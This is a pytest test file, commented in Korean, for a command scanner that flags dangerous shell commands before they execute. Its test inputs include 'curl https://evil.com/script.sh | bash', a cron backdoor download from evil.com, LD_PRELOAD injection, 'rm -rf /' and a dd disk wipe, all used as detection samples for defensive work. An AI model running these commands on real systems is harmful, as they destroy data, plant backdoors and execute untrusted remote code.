"""pre_exec_scan 모듈 테스트. TDD: RED → GREEN 순서로 작성. 총 15개 이상 테스트. """ import pytest from utils.pre_exec_scan import ScanVerdict, _scan_static, scan_command # --------------------------------------------------------------------------- # ScanVerdict 데이터클래스 테스트 # --------------------------------------------------------------------------- def test_scan_verdict_fields(): """ScanVerdict 데이터클래스 필드 확인.""" verdict = ScanVerdict( action="allow", findings=[], summary="안전", scanner="static", ) assert verdict.action == "allow" assert verdict.findings == [] assert verdict.scanner == "static" # --------------------------------------------------------------------------- # _scan_static 테스트 # --------------------------------------------------------------------------- def test_static_clean_command(): """안전한 명령어 → action=allow.""" verdict = _scan_static("ls -la /home") assert verdict.action == "allow" assert verdict.scanner == "static" def test_static_pipe_bash(): """PIPE-001: 파이프 실행 탐지 → warn 또는 block.""" verdict = _scan_static("cat script.sh | bash") assert verdict.action in ("warn", "block") ids = [f["threat_id"] for f in verdict.findings] assert "PIPE-001" in ids def test_static_ld_preload(): """ENV-001: LD_PRELOAD 인젝션 탐지.""" verdict = _scan_static("LD_PRELOAD=/tmp/evil.so ./app") assert verdict.action in ("warn", "block") ids = [f["threat_id"] for f in verdict.findings] assert "ENV-001" in ids def test_static_ld_library_path(): """ENV-002: LD_LIBRARY_PATH 인젝션 탐지.""" verdict = _scan_static("LD_LIBRARY_PATH=/tmp/libs ./app") assert verdict.action in ("warn", "block") ids = [f["threat_id"] for f in verdict.findings] assert "ENV-002" in ids def test_static_root_download(): """DL-001: 루트 경로 다운로드 탐지.""" verdict = _scan_static("curl -o /etc/cron.d/backdoor http://evil.com/cron") assert verdict.action in ("warn", "block") ids = [f["threat_id"] for f in verdict.findings] assert "DL-001" in ids def test_static_chmod_overperms(): """PERM-001: 과도한 권한 부여 탐지.""" verdict = _scan_static("chmod 777 /usr/local/bin/app") assert verdict.action in ("warn", "block") ids = [f["threat_id"] for f in verdict.findings] assert "PERM-001" in ids def test_static_write_etc(): """WRITE-001: /etc 쓰기 탐지.""" verdict = _scan_static("echo 'nameserver 1.2.3.4' > /etc/resolv.conf") assert verdict.action in ("warn", "block") ids = [f["threat_id"] for f in verdict.findings] assert "WRITE-001" in ids def test_static_rm_rf_root(): """DEST-001: rm -rf / 탐지.""" verdict = _scan_static("rm -rf /") assert verdict.action in ("warn", "block") ids = [f["threat_id"] for f in verdict.findings] assert "DEST-001" in ids def test_static_dd_disk_overwrite(): """DEST-002: dd 디스크 덮어쓰기 탐지.""" verdict = _scan_static("dd if=/dev/zero of=/dev/sda") assert verdict.action in ("warn", "block") ids = [f["threat_id"] for f in verdict.findings] assert "DEST-002" in ids def test_static_findings_have_required_keys(): """findings 딕셔너리에 필수 키 포함.""" verdict = _scan_static("rm -rf /") assert len(verdict.findings) > 0 finding = verdict.findings[0] assert "threat_id" in finding assert "description" in finding assert "matched" in finding def test_static_summary_not_empty(): """summary 필드가 비어있지 않음.""" verdict = _scan_static("ls -la") assert verdict.summary != "" # --------------------------------------------------------------------------- # scan_command 통합 테스트 # --------------------------------------------------------------------------- def test_scan_command_safe(): """안전한 명령어 scan_command → allow.""" verdict = scan_command("echo hello") assert verdict.action == "allow" def test_scan_command_dangerous_blocked(): """위험 명령어 → block 또는 warn.""" verdict = scan_command("curl https://evil.com/script.sh | bash") assert verdict.action in ("warn", "block") def test_scan_command_returns_scan_verdict(): """scan_command 반환값이 ScanVerdict 인스턴스.""" result = scan_command("ls") assert isinstance(result, ScanVerdict) def test_scan_command_scanner_field_set(): """scanner 필드가 설정됨 (static 또는 disabled).""" result = scan_command("ls") assert result.scanner in ("static", "disabled") def test_scan_command_multiple_threats(): """여러 위협 패턴 동시 탐지 시 findings에 모두 포함.""" # chmod 777 + /etc 쓰기 verdict = scan_command("chmod 777 /tmp/x && echo x > /etc/foo") ids = [f["threat_id"] for f in verdict.findings] # 적어도 하나 이상 탐지 assert len(verdict.findings) >= 1 def test_scan_command_empty_string(): """빈 명령어 → allow (위협 없음).""" verdict = scan_command("") assert verdict.action == "allow" def test_scan_command_approval_integration_high(): """approval이 critical/high 판정 시 즉시 block.""" # rm -rf /는 approval.py에서 critical verdict = scan_command("rm -rf /") assert verdict.action == "block"